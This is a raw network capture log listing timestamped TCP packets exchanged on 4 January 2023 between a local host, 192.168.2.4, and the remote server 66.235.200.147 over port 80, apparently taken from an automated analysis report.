Jan 4, 2023 16:47:39.050009012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050031900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050055981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050082922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050091982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050091982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050091982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050091982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050091982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050112009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050132036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050139904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050173044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050180912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050204039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050205946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050216913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050231934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050254107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050259113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050266981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050287962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050340891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050342083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050538063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050582886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050612926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050617933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050632954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050647020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050662041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050679922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050698042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050729036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050729990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050759077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050776958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050790071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050803900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050821066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050842047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050851107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050874949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050877094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050890923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050898075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050916910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050920010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050941944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050964117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050990105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050991058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.050990105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.050990105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051012039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051035881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051042080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051054955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051064014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051089048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051110983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051132917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051166058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051166058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051166058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051166058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051183939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051474094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051506042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051532984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051541090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051552057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051563978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051600933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051621914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051630020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051630020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051630020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051630020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051644087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051660061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051660061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051666975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051687002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051692009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051701069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051722050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051734924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051752090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051763058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051784039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051798105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051819086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051841021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051861048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051863909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051863909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051879883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051882982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051902056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051913023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051918983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051944017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051968098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.051973104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.051991940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052001953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052031994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052064896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052064896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052081108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052457094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052479982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052501917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052529097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052536964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052556992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052563906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052583933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.052597046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.052635908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.054395914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.054580927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066221952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066262960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066337109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066337109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066473961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066502094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066525936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066540003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066551924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066567898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066579103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066586018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066601992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066612959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066628933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066641092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066660881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066668987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066689014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066723108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066735029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066775084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066801071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066809893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066828966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066837072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066867113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066875935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066895962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066912889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066942930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066967010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.066991091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.066992044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067022085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067033052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067059994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067086935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067111969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067131042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067141056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067157984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067187071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067198992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067199945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067226887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067253113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067254066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067280054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067297935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067297935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067327023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067336082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067373037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067377090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067399979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067425013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067425966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067437887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067477942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067478895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067487001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067514896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067528009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067539930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067558050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067559004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067567110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067585945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067595005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067631006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067681074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.067723989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.067723989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.068522930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068551064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068577051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068602085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068605900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.068605900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.068623066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.068625927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068644047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.068675041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.068923950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068950891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068974972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.068980932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069000959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069004059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069021940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069029093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069061041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069083929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069096088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069123030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069143057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069149017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069166899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069175959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069192886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069202900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069221020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069230080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069245100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069257975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069273949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069284916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069303989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069313049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069329977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069339037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069356918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069367886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069394112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069392920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069406986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069421053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069447041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069448948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069461107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069473982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069490910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069499969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069541931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069668055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.069709063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.069709063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070355892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070427895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070461035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070487022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070513010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070512056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070538998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070543051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070557117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070565939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070588112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070591927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070600033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070619106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070652008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070662022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070664883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070703983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070710897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070734024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070761919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070770979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070782900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070792913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070805073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070827007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070844889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070856094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070883036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070884943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070907116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070915937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070931911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070946932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070976973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.070997000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.070997000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071007967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071037054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071067095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071094990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071094990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071094990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071208000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071238041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071283102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071325064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071367979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071398973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071398020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071398020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071398020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071429968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071429968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071446896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071460962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071491003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071521997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071528912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071528912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071558952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071568966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071608067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071640015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071655989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071686029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071686029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071686029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071686029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071686029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071717024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071744919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071747065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071744919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071767092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071779966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071808100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071825027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071825981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071837902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071856022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071871042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071896076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071911097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071943045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.071959019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.071959019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.072002888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:44.868390083 CET	49696	80	192.168.2.4	66.235.200.147
